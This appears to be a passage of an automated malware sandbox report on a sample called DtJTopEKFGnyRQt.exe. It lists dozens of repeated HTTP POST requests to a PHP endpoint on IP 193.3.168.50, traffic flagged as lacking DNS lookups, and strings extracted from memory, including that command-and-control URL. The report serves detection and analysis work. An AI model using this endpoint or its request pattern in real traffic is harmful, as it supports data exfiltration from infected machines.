Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1888Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1888Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1008Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1888Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1008Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1888Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1888Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1888Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1860Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1888Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1888Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1888Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1008Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1888Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1888Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 1008Expect: 100-continue

Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50
Source: unknown	TCP traffic detected without corresponding DNS query: 193.3.168.50

Source: unknown

HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.3.168.50Content-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.0000000003546000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.000000000365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.3.168.50
Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.0000000003465000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.00000000038CE000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.0000000003546000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.000000000365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalData
Source: svchost.exe, 0000002C.00000002.3379140850.0000021BDCC00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.44.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.44.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.44.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.44.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.44.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
